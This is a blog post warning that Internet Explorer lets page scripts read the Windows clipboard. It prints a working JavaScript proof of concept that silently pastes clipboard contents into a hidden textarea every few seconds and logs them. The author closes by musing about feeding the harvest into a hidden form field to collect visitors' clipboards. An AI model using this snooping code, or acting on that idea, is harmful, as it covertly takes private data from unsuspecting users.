MegaZone (zonereyrie) wrote,
MegaZone
zonereyrie

  • Mood:
  • Music:

Another reason not to use IE

OK, so I know all browsers have had security flaws - but this one just amazes me because it appears to not be a flaw, but *deliberate*.

VBScript in a webpage view in IE has access to your Windows *Clipboard*. Anything on the clipboard appears to be free game.

http://www.anonymizer.com/snoop/test_clipboard.shtml


<form name=clippie>
<textarea id=MAIN rows=20 cols=50></textarea>

<textarea id=SWAP rows=1 cols=1></textarea>
</form>

<script>

var interval = 4000;
var prevClipboard = "";
var clipHistory = "";

function main ()
{
window.setTimeout("test();", interval);
return;
}

function test()
{

document.clippie.SWAP.value = "";
document.clippie.SWAP.focus();
document.execCommand("paste");
document.clippie.SWAP.blur();
newClipboard = document.clippie.SWAP.value;

document.clippie.SWAP.value = "";
if(newClipboard == prevClipboard)
{
window.setTimeout("test()", interval);
return;
}
clipHistory += "----> " + (new Date()) + ": ";

clipHistory += newClipboard + "";
prevClipboard = newClipboard;

document.clippie.MAIN.value = clipHistory;

window.setTimeout("test();", interval);
return;
}

main();

</script>


I'm tempted to take that code and have it set the value of a hidden form field on some innocent form just to see what people have on the clipboards...
Subscribe
  • Post a new comment

    Error

    Anonymous comments are disabled in this journal

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

  • 4 comments